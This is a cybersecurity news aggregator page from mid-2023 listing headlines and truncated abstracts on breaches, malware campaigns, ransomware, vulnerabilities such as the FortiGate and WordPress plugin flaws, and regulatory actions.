The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France , and Italy last year. The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies CDON, Coop, Dagens Industri, and Tele2. "In its audits, IMY considers that the data transferred to the U.S. via Google's statistics tool is personal data because the data can be linked with other unique data that is transferred," IMY said . "The authority also concludes that the technical security measures that the companies have taken are not sufficient to ensure a level of protection that essentially corresponds to that guaranteed within the EU/EEA." The data protection authority also fined $1.1 million for Swedish telecom service provider Tele2 and less than $30,000 for local online marketplace CDON failing toThe Hacker News
July 4, 2023 – Breach
MOVEit attack on Aon exposed data of the staff at the Dublin Airport Full Text
Abstract
Personal data of the personnel at the Dublin Airport was compromised due to a MOVEit attack on professional service provider Aon. Data of about 3000 employees of Dublin Airport (DDA) were compromised after professional service provider Aon fell victim...Security Affairs
July 4, 2023 – General
Manufacturing companies hit by ransomware had their data encrypted: Report Full Text
Abstract
the percentage of manufacturing organizations that used back backups to recover data has increased, with 73% of the manufacturing organizations surveyed using backups this year versus 58% in the previous year.Cyware
July 04, 2023 – Hacker
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors Full Text
Abstract
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users," cybersecurity company Sekoia said in a technical write-up. DDoSia is attributed to a pro-Russian hacker group called NoName(057)16 . Launched in 2022 and a successor of the Bobik botnet , the attack tool is designed for staging distributed denial-of-service (DDoS) attacks against targets primarily located in Europe as well as Australia, Canada, and Japan. Lithuania, Ukraine, Poland, Italy, Czechia, Denmark, Latvia, France, the U.K., and Switzerland have emerged as the most targeted countries over a period ranging from May 8 to June 26, 2023. A total of 486 different wThe Hacker News
July 4, 2023 – Criminals
Neo_Net runs eCrime campaign targeting clients of banks globally Full Text
Abstract
A Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide. A joint study conducted by vx-underground and SentinelOne recently revealed that a Mexican threat actor that goes online...Security Affairs
July 4, 2023 – Malware
New Malware Alert: EarlyRAT Linked to North Korean Hacking Group Full Text
Abstract
EarlyRAT is a straightforward program that immediately starts gathering system data and sending it via a POST request to the C2 server. The execution of commands on the infected system is EarlyRAT’s second main purpose.Cyware
July 04, 2023 – Criminals
Mexico-Based Hacker Targets Global Banks with Android Malware Full Text
Abstract
An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net , according to security researcher Pol Thill. The findings were published by SentinelOne following a Malware Research Challenge in collaboration with vx-underground. "Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims' bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims," Thill said . Some of the major targets include banks such as Santander, BBVA, CaixaBank, Deutsche Bank, Crédit Agricole, and ING. Neo_Net, linked to a Spanish-speaking actor residing in Mexico, has established themselves as aThe Hacker News
July 4, 2023 – Outage
Hackers stole millions of dollars worth of crypto assets from Poly Network platform Full Text
Abstract
Poly Network platform suspended its services during the weekend due to a cyber attack that resulted in the theft of millions of dollars in crypto assets. Threat actors have stolen millions of dollars worth of crypto assets from the Poly Network platform...Security Affairs
July 4, 2023 – Breach
Major Data Leaks on TikTok, Instagram, and Yahoo Full Text
Abstract
A SOCRadar dark web analyst recently discovered an alleged database leak for Instagram. The leaked data reportedly contains over 17 million records in JSON format. The nature of the data suggests that it may have been collected from open source.Cyware
July 04, 2023 – Vulnerabilities
Alert: 330,000 FortiGate Firewalls Still Unpatched to CVE-2023-27997 RCE Flaw Full Text
Abstract
No less than 330,000 FortiGate firewalls are still unpatched and vulnerable to CVE-2023-27997, a critical security flaw affecting Fortinet devices that has come under active exploitation in the wild. Cybersecurity firm Bishop Fox, in a report published last week, said that out of nearly 490,000 Fortinet SSL-VPN interfaces exposed on the internet, about 69 percent remain unpatched. CVE-2023-27997 (CVSS score: 9.8), also called XORtigate, is a critical vulnerability impacting Fortinet FortiOS and FortiProxy SSL-VPN appliances that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. Patches were released by Fortinet last month in versions 6.0.17, 6.2.15, 6.4.13, 7.0.12, and 7.2.5, although the company acknowledged that the flaw may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors. Bishop Fox's analysis further found that 153,414The Hacker News
July 4, 2023 – Vulnerabilities
335,923 out of 489,337 Fortinet firewalls vulnerable to CVE-2023-27997 Full Text
Abstract
Researchers reported that there are 490,000 Fortinet firewalls exposing SSL VPN interfaces on the internet, and roughly 69% of them are still vulnerable to CVE-2023-27997. In Mid-June Fortinet addressed a critical flaw, tracked as CVE-2023-27997...Security Affairs
July 4, 2023 – Criminals
Anonymous Sudan Claims to Have Stolen 30 Million Microsoft’s Customer Accounts Full Text
Abstract
Attackers said “We announce that we have successfully hacked Microsoft and have access to a large database containing more than 30 million Microsoft accounts, email and password. Price for full database : 50,000 USD.”Cyware
July 4, 2023 – General
Report: Fileless Attacks Increase by 1,400% Full Text
Abstract
Protecting runtime environments requires at least a monitoring approach that includes scanning for known malicious files and network communications, then blocking them and alerting when they appear. However, this is still insufficient.Cyware
July 3, 2023 – Attack
GCHQ reveals British government was hacked by foreign cyber spies 20 years ago Full Text
Abstract
This month marks the 20th anniversary of the first time cyber experts at GCHQ responded to a foreign state hacking the British government, the intelligence and security agency revealed on Friday.Cyware
July 03, 2023 – Hacker
Chinese Hackers Use HTML Smuggling to Infiltrate European Ministries with PlugX Full Text
Abstract
A Chinese nation-state group has been observed targeting Foreign Affairs ministries and embassies in Europe using HTML smuggling techniques to deliver the PlugX remote access trojan on compromised systems. Cybersecurity firm Check Point said the activity, dubbed SmugX , has been ongoing since at least December 2022. "The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors," Check Point said . "Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar." The exact identity of the threat actor behind the operation is a little hazy, although existing clues point in the direction of Mustang Panda , which also shares overlaps with clusters tracked as Earth Preta, RedDelta, and Check Point's own dThe Hacker News
July 3, 2023 – Breach
Anonymous Sudan claims to have stolen 30 million Microsoft’s customer accounts Full Text
Abstract
Microsoft denied the data breach after the collective of hacktivists known as Anonymous Sudan claimed to have hacked the company. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing...Security Affairs
July 3, 2023 – Attack
Hacks targeting British exam boards raise fears of students cheating Full Text
Abstract
Police in Britain are investigating multiple incidents in which national exam papers for school-leavers were stolen by hackers and sold online to students seeking to cheat on their tests.Cyware
July 03, 2023 – Solution
Improve Your Security WordPress Spam Protection With CleanTalk Anti-Spam Full Text
Abstract
Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results, overload your web server, and divert your focus from website development. Website owners and webmasters need a solution to this problem. When selecting an anti-spam solution, the following requirements should be taken into account: The solution must operate automatically, eliminating the need for manual spam checks. It should provide a quick and efficient method of accuracy control. It must be universal, protecting all website forms simultaneously. It should be easy and straightforward to install and set up. It should not require any extra steps from your visitors, ensuring they doThe Hacker News
July 3, 2023
SmugX: Chinese APT uses HTML smuggling to target European Ministries and embassies Full Text
Abstract
China-linked APT group was spotted using HTML smuggling in attacks aimed at Foreign Affairs ministries and embassies in Europe. A China-linked APT group was observed using HTML smuggling in attacks against Foreign Affairs ministries and embassies...Security Affairs
July 3, 2023 – Breach
Ireland: Dublin Airport staff pay data hit by criminals Full Text
Abstract
Pay and benefits details of Dublin Airport staff were compromised in a cyberattack on professional service provider Aon, highlighting the vulnerability of supply chain attacks.Cyware
July 03, 2023 – Government
CISA Flags 8 Actively Exploited Flaws in Samsung and D-Link Devices Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has placed a set of eight flaws to the Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. This includes six shortcomings affecting Samsung smartphones and two vulnerabilities impacting D-Link devices. All the flaws have been patched as of 2021. CVE-2021-25394 (CVSS score: 6.4) - Samsung mobile devices race condition vulnerability CVE-2021-25395 (CVSS score: 6.4) - Samsung mobile devices race condition vulnerability CVE-2021-25371 (CVSS score: 6.7) - An unspecified vulnerability in the DSP driver used in Samsung mobile devices that allows loading of arbitrary ELF libraries CVE-2021-25372 (CVSS score: 6.7) - Samsung mobile devices improper boundary check within the DSP driver in Samsung mobile devices CVE-2021-25487 (CVSS score: 7.8) - Samsung mobile devices out-of-bounds read vulnerability leading to arbitrary code execution CVE-2021-25489 (CVSS score: 5.5) - SamsungThe Hacker News
July 3, 2023 – Education
The Impacts of Data Loss on Your Organization Full Text
Abstract
What are the causes of Data Loss and which are their impact on your organization? In today's digital age, data has become the lifeblood of organizations, driving critical decision-making, improving operational efficiency, and allowing for smoother...Security Affairs
July 3, 2023 – Attack
GuLoader Campaign Targets Law Firms in the US Full Text
Abstract
The GuLoader malware campaign utilizes a multi-stage infection chain, including a PDF lure, a GuLoader VBScript, and obfuscated Powershell scripts, to deliver the Remcos RAT.Cyware
July 03, 2023 – Malware
Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets Full Text
Abstract
In yet another sign of a lucrative crimeware-as-a-service ( CaaS ) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions. "The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data." "From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable." Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail. It'sThe Hacker News
July 3, 2023 – Government
CISA adds Samsung and D-link bugs to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added actively exploited Samsung and D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added six Samsung and two D-Link vulnerabilities to its Known Exploited...Security Affairs
July 3, 2023 – Phishing
Torrent of image-based phishing emails are harder to detect and more convincing Full Text
Abstract
Phishing mongers have released a torrent of image-based junk emails that embed QR codes into their bodies to successfully bypass security protections and provide a level of customization to more easily fool recipients, researchers said.Cyware
July 03, 2023 – Criminals
BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising Full Text
Abstract
Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application. "Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer." Malvertising refers to the use of SEO poisoning techniques to spread malware via online advertising. It typically involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to sketchy pages. The idea is to trick users searching for applications like WinSCP into downloading malware, in this instance, a backdoor that contains a Cobalt Strike Beacon that connects to aThe Hacker News
July 3, 2023 – Malware
New Windows Meduza Stealer targets tens of crypto wallets and password managers Full Text
Abstract
Researchers spotted a new Windows information stealer called Meduza Stealer, the authors employ sophisticated marketing strategies to promote it. The Meduza Stealer can steal browsing activities and extract a wide array of browser-related data, including...Security Affairs
July 3, 2023 – Breach
HHS Says At Least 100,000 People’s Data Exposed After Hacks at Government Contractors Full Text
Abstract
While no HHS systems or networks were compromised, attackers gained access to HHS data by exploiting the vulnerability in the MOVEit software used by third-party vendors, the official said.Cyware
July 3, 2023 – Malware
Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware Full Text
Abstract
Researchers spotted a new version of the RustBucket Apple macOS malware that supports enhanced capabilities. Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm...Security Affairs
July 3, 2023 – General
One third of security breaches go unnoticed by security professionals Full Text
Abstract
94% of global respondents believe their hybrid cloud security offers full visibility into IT infrastructure, yet almost one-third of security breaches go undetected by IT pros, according to a Gigamon report.Cyware
July 2, 2023 – General
Security Affairs newsletter Round 426 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. WordPress...Security Affairs
July 2, 2023 – Attack
WordPress sites using the Ultimate Member plugin are under attack Full Text
Abstract
Threat actors are exploiting a critical WordPress zero-day in the Ultimate Member plugin to create secret admin accounts. Hackers are actively exploiting a critical unpatched WordPress Plugin flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), to create...Security Affairs
July 1, 2023 – Vulnerabilities
200,000 WordPress Sites Exposed to Attacks Exploiting Flaw in ‘Ultimate Member’ Plugin Full Text
Abstract
Tracked as CVE-2023-3460 (CVSS score of 9.8), the recently identified security defect in Ultimate Member plugin allows attackers to add a new user account to the administrators group.Cyware
July 01, 2023 – Vulnerabilities
Hackers Exploiting Unpatched WordPress Plugin Flaw to Create Secret Admin Accounts Full Text
Abstract
As many as 200,000 WordPress websites are at risk of ongoing attacks exploiting a critical unpatched security vulnerability in the Ultimate Member plugin. The flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), impacts all versions of the Ultimate Member plugin, including the latest version (2.6.6) that was released on June 29, 2023. Ultimate Member is a popular plugin that facilitates the creation of user-profiles and communities on WordPress sites. It also provides account management features. "This is a very serious issue: unauthenticated attackers may exploit this vulnerability to create new user accounts with administrative privileges, giving them the power to take complete control of affected sites," WordPress security firm WPScan said in an alert. Although details about the flaw have been withheld due to active abuse, it stems from an inadequate blocklist logic put in place to alter the wp_capabilities user meta value of a new user to that of an administrator aThe Hacker News
July 1, 2023 – Breach
More than 16 million people and counting have had data exposed in MOVEit breaches Full Text
Abstract
Since June 1, experts have warned of the vulnerability affecting the popular file transfer software, and dozens of the biggest organizations in the U.S. and Europe have since come forward to reveal that they were affected by the situation.Cyware
July 01, 2023 – Malware
Beware: New ‘RustBucket’ Malware Variant Targeting macOS Users Full Text
Abstract
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called RustBucket that comes with improved capabilities to establish persistence and avoid detection by security software. "This variant of RustBucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report published this week, adding it's "leveraging a dynamic network infrastructure methodology for command-and-control." RustBucket is the work of a North Korean threat actor known as BlueNoroff, which is part of a larger intrusion set tracked under the name Lazarus Group , an elite hacking unit supervised by the Reconnaissance General Bureau (RGB), the country's primary intelligence agency. The malware came to light in April 2023, when Jamf Threat Labs described it as an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server. ElasThe Hacker News
July 1, 2023 – Breach
Update: 1.1 Million NHS Patients’ Data Also Breached in the University of Manchester Attack Full Text
Abstract
The compromised NHS data includes records of major trauma patients across England and individuals treated after terror attacks, which the university collected for research purposes, according to media outlet The Independent on Thursday.Cyware
July 1, 2023 – Criminals
LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC Full Text
Abstract
The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and $70 million ransom. TSMC...Security Affairs
July 1, 2023 – Outage
Hackers claim to take down Russian satellite communications provider Full Text
Abstract
A group of previously unknown hackers has claimed responsibility for a cyberattack on the Russian satellite communications provider Dozor-Teleport, which is used by energy companies and the country's defense and security services.Cyware
July 1, 2023 – Ransomware
Avast released a free decryptor for the Windows version of the Akira ransomware Full Text
Abstract
Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. Cybersecurity firm Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data...Security Affairs
July 1, 2023 – Phishing
Malvertising Used as Entry Vector for BlackCat, Actors Also Leverage SpyBoy Terminator Full Text
Abstract
The infection chain started with a malicious ad for the WinSCP application displayed in search engine results. Users who clicked on the ad were redirected to a cloned download webpage where they unknowingly downloaded a malware-infected ISO file.Cyware
June 30, 2023 – General
Japan Threat Landscape Takes on Global Significance Full Text
Abstract
The primary cause of cyberattacks against Japanese computer systems is the strength and quality of its manufacturing base. The size of Japanese manufacturers makes them an attractive target for criminal extortion.Cyware
June 30, 2023 – Hacker
Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks Full Text
Abstract
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiaoThe Hacker News
June 30, 2023
Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text
Abstract
Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
June 30, 2023 – General
3 Reasons SaaS Security is the Imperative First Step to Ensuring Secure AI Usage Full Text
Abstract
In today's fast-paced digital landscape, the widespread adoption of AI (Artificial Intelligence) tools is transforming the way organizations operate. From chatbots to generative AI models, these SaaS-based applications offer numerous benefits, from enhanced productivity to improved decision-making. Employees using AI tools experience the advantages of quick answers and accurate results, enabling them to perform their jobs more effectively and efficiently. This popularity is reflected in the staggering numbers associated with AI tools. OpenAI's viral chatbot, ChatGPT, has amassed approximately 100 million users worldwide, while other generative AI tools like DALL·E and Bard have also gained significant traction for their ability to generate impressive content effortlessly. The generative AI market is projected to exceed $22 billion by 2025, indicating the growing reliance on AI technologies. However, amidst the enthusiasm surrounding AI adoption, it is imperative to addressThe Hacker News
June 30, 2023 – Vulnerabilities
miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug Full Text
Abstract
A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin, can allow gaining access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress...Security Affairs
June 30, 2023 – Solution
WhatsApp Upgrades Proxy Feature Against Internet Shutdowns Full Text
Abstract
Meta's WhatsApp has rolled out updates to its proxy feature, allowing more flexibility in the kind of content that can be shared in conversations. This includes the ability to send and receive images, voice notes, files, stickers and GIFs, WhatsApp told The Hacker News. The new features were first reported by BBC Persian. Some of the other improvements include streamlined steps to simplify the setup process as well as the introduction of shareable links to "share functioning/valid proxy addresses to their contacts for easy and automatic installation." Support for proxy servers was officially launched by the messaging service earlier this January , thereby helping users circumvent government-imposed censorship and internet shutdowns and obtain indirect access to WhatsApp. The company has also made available a reference implementation for setting up a proxy server with ports 80, 443 or 5222 available and domain name that points to the server's IP address. &The Hacker News
June 30, 2023
North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text
Abstract
North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...Security Affairs
June 30, 2023 – Criminals
Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text
Abstract
An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that caThe Hacker News
June 30, 2023 – General
MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk? Full Text
Abstract
MITRE has released its annual list of the Top 25 "most dangerous software weaknesses" for the year 2023. "These weaknesses lead to serious vulnerabilities in software," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said . "An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working." The list is based on an analysis of public vulnerability data in the National Vulnerability Data ( NVD ) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity. Coming out top is Out-of-bounds Write, followed by Cross-site Scripting, SQL Injection, Use After Free, OS Command Injection, Improper Input Validation, Out-of-bounds Read, Path Traversal, Cross-Site Request Forgery (CSRF), and Unrestricted Upload of File with Dangerous Type. Out-ofThe Hacker News
June 29, 2023 – Attack
8Base Ransomware Activity Spikes, Researcher Warn Full Text
Abstract
Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin ... Read MoreCyware
June 29, 2023 – Hacker
From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon Full Text
Abstract
The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom made, actively developed framework has been leveraged in the February 2023 attack on Technion , an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers . "It is structurally and functionally similar to MuddyC3 , a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyberThe Hacker News
June 29, 2023 – Breach
The phone monitoring app LetMeSpy disclosed a data breach Full Text
Abstract
Android app LetMeSpy disclosed a security breach, sensitive data associated with thousands of Android users were exposed. The phone monitoring app LetMeSpy disclosed a security breach, threat actors have stolen sensitive data associated with thousands...Security Affairs
June 29, 2023 – Government
European Cyber Agency Remains Underfunded Full Text
Abstract
There are multiple discrepancies in how the European Commission allocates funds to the cyber agency, Juhan Lepassaar, the executive director of the EU Agency for Cybersecurity, said during a Tuesday parliamentary hearing evaluating allocated budgets.Cyware
June 29, 2023 – Malware
Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text
Abstract
Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse . The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication bThe Hacker News
June 29, 2023 – Malware
Previously undetected ThirdEye malware appears in the threat landscape Full Text
Abstract
A new Windows information stealer dubbed ThirdEye appeared in the threat landscape, it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...Security Affairs
June 29, 2023 – Vulnerabilities
Details Disclosed for Critical SAP Vulnerabilities, Including Wormable Exploit Chain Full Text
Abstract
The vulnerabilities are tracked as CVE-2021-27610, CVE-2021-33677, CVE-2021-33684, and CVE-2023-0014, and they impact products that use the SAP Application Server for ABAP component.Cyware
June 29, 2023 – Solution
The Right Way to Enhance CTI with AI (Hint: It’s the Data) Full Text
Abstract
Cyber threat intelligence is an effective weapon in the ongoing battle to protect digital assets and infrastructure - especially when combined with AI. But AI is only as good as the data feeding it. Access to unique, underground sources is key. Threat Intelligence offers tremendous value to people and companies. At the same time, its ability to address organizations' cybersecurity needs and the benefits it offers vary by company, industry, and other factors. A common challenge with cyber threat intelligence (CTI) is that the data it produces can be vast and overwhelming, creating confusion and inefficiencies among security teams' threat exposure management efforts. Additionally, organizations have different levels of security maturity, which can make access to and understanding of CTI data difficult. Enter generative AI. Many cybersecurity companies – and more specifically, threat intelligence companies – are bringing generative AI to market to simplify threat intelligence aThe Hacker News
June 29, 2023 – Criminals
Former Group-IB manager has been arrested in Kazahstan Full Text
Abstract
The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...Security Affairs
June 29, 2023 – General
Saudi Arabia’s Cyber Capabilities Ranked Second Globally Full Text
Abstract
According to the IIMD, the development of a National Cybersecurity Authority (NCA) and the planned development of a Global Cybersecurity Forum institute in the country have both affirmed Saudi Arabia's role in the field of cybersecurity.Cyware
June 29, 2023 – Hacker
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware Full Text
Abstract
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff ) and other subordinate elements collectively tracked under the umbrella name Lazarus Group . The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdThe Hacker News
June 29, 2023 – Vulnerabilities
Experts published PoC exploits for Arcserve UDP authentication bypass issue Full Text
Abstract
Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity bypass authentication flaw, tracked as CVE-2023-26258, in its Unified...Security Affairs
June 29, 2023 – Government
Cyber Command to expand ‘canary in the coal mine’ unit working with private sector Full Text
Abstract
U.S. Cyber Command is doubling the size of a little-known program that serves as one of the military's chief links to private industry in order to bolster the country’s defenses against cyber threats.Cyware
June 29, 2023 – Breach
Android Spy App LetMeSpy Suffers Major Data Breach, Exposing Users’ Personal Data Full Text
Abstract
Android-based phone monitoring app LetMeSpy has disclosed a security breach that allowed an unauthorized third-party to steal sensitive data associated with thousands of Android users. "As a result of the attack, the criminals gained access to email addresses, telephone numbers and the content of messages collected on accounts," LetMeSpy said in an announcement on its website, noting the incident took place on June 21, 2023. Following the discovery of the hack, LetMeSpy said it notified law enforcement and data protection authorities. It's also taking steps to suspend all account-related functions until further notice. The identity of the threat actor and their motives are currently unknown. The work of a Polish company named Radeal, LetMeSpy is offered as a monthly subscription ($6 for Standard or $12 for Pro), allowing its customers to snoop on others simply by installing the software on their devices. An Internet Archive snapshot from December 2013 shows that iThe Hacker News
June 29, 2023 – Hacker
Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor Full Text
Abstract
The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation.Cyware
June 29, 2023 – Vulnerabilities
Critical Security Flaw in Social Login Plugin for WordPress Exposes Users’ Accounts Full Text
Abstract
A critical security flaw has been disclosed in miniOrange's Social Login and Register plugin for WordPress that could enable a malicious actor to log in as any user-provided information about email address is already known. Tracked as CVE-2023-2982 (CVSS score: 9.8), the authentication bypass flaw impacts all versions of the plugin, including and prior to 7.6.4. It was addressed on June 14, 2023, with the release of version 7.6.5 following responsible disclosure on June 2, 2023. "The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address," Wordfence researcher István Márton said . The issue is rooted in the fact that the encryption key used to secure the information during login using social media accounts is hard-coded, thus leading to a scenario where attackers could create a valid request with a properlThe Hacker News
June 29, 2023 – Ransomware
Dark Power Ransomware on the Ascent – A Technical Insight into 2023’s Latest Ransomware Strain Full Text
Abstract
Dark Power is a highly advanced ransomware strain that uses advanced encryption techniques and targets various industries globally. It stops critical system services and processes, encrypts files, and drops a ransom note with payment instructions.Cyware
June 29, 2023 – Malware
Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text
Abstract
